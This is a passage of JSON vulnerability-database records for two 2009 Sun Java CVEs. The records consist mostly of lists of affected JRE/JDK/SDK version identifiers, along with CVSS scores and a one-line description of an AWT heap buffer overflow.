"cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:sdk:1.4.2_23", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3875", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3875", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update14:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update11_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Heap-based buffer overflow in the setBytePixels function in the Abstract Window Toolkit (AWT) in Java Runtime Environment (JRE) in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to execute arbitrary code via crafted arguments, aka Bug Id 6872358.", "edition": 7, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3871", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3871"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3871", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3871", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, 